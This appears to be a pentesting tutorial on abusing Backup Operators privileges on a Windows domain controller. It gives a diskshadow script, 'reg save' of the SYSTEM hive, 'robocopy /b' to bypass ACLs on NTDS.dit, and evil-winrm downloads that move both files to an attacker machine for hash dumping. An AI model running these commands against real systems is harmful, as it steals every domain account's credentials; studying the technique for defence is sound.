Membership in the Backup Operators group grants SeBackupPrivilege and SeRestorePrivilege, which together give read (and write) access to the domain controller's file system regardless of NTFS permissions. These privileges let a process traverse folders, list directories and copy files it has no ACL access to, provided the files are opened with the FILE_FLAG_BACKUP_SEMANTICS flag. Ordinary copy commands do not set this flag, so a tool that uses backup semantics (robocopy /b, or a purpose-written script) is required.
In practice this means a Backup Operator can snapshot the DC's system volume, copy NTDS.dit and the SYSTEM registry hive out of the snapshot, move both files offline and dump the password hashes of every domain account. The snapshot is needed because the live NTDS.dit is held open exclusively by the directory service and cannot be copied directly.
<aside> ℹ️ Shadow Copy, also known as Volume Shadow Copy Service (VSS), is a feature of Windows client and server editions that takes point-in-time snapshots of files and folders on a volume, even while those files are in use. It is delivered by the Windows service called Volume Shadow Copy and, for applications that consume it, by a VSS provider.
The process has two stages: the Volume Shadow Copy service initiates and coordinates creation of the snapshot, and the VSS provider performs the actual data transfer.
Snapshots are copy-on-write: only the blocks that change after a snapshot is taken are stored, so many versions of a given file can be kept without consuming much disk space.
This feature is normally enabled on volumes shared by many users, where accidental or intentional deletion and modification of data is frequent, such as a file server.
DiskShadow is a Microsoft-signed binary that assists administrators with operations related to the Volume Shadow Copy Service (VSS). It has two modes, interactive and script, so a script file can hold all the commands needed to automate NTDS.dit extraction. The script file used below creates a new volume shadow copy and exposes it as a new drive letter; the copy is then made from that drive, and the shadow copy can be removed afterwards with diskshadow's delete shadows command.
</aside>
From the Linux (attacker) machine, create a backup.txt file containing the commands below. The trailing X on each line is deliberate: when the script is written on Linux and uploaded, diskshadow has been observed to drop the last character of each line, and the X absorbs that. A script written natively on Windows with CRLF line endings does not need the padding.

```
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backup
```
From a remote session on the target machine (for example an evil-winrm shell, whose built-in upload and download commands are used below), run:

```
mkdir C:\Temp
cd C:\Temp
upload /<PATH-TO-BACKUP.TXT>/backup.txt
diskshadow /s backup.txt
```
The SYSTEM registry hive must be copied as well: it holds the boot key that decrypts the password encryption key protecting the hashes stored in the NTDS file:

```
reg save hklm\system c:\temp\system
```
Once that is done, copy NTDS.dit out of the exposed shadow copy with robocopy in backup mode (/b opens files with backup semantics, so the ACL on the NTDS folder is bypassed), then download both files to the attacker machine:

```
robocopy /b E:\Windows\ntds . ntds.dit
download ntds.dit /home/kali/Downloads/ntds.dit
download C:\Temp\system /home/kali/Downloads/system
```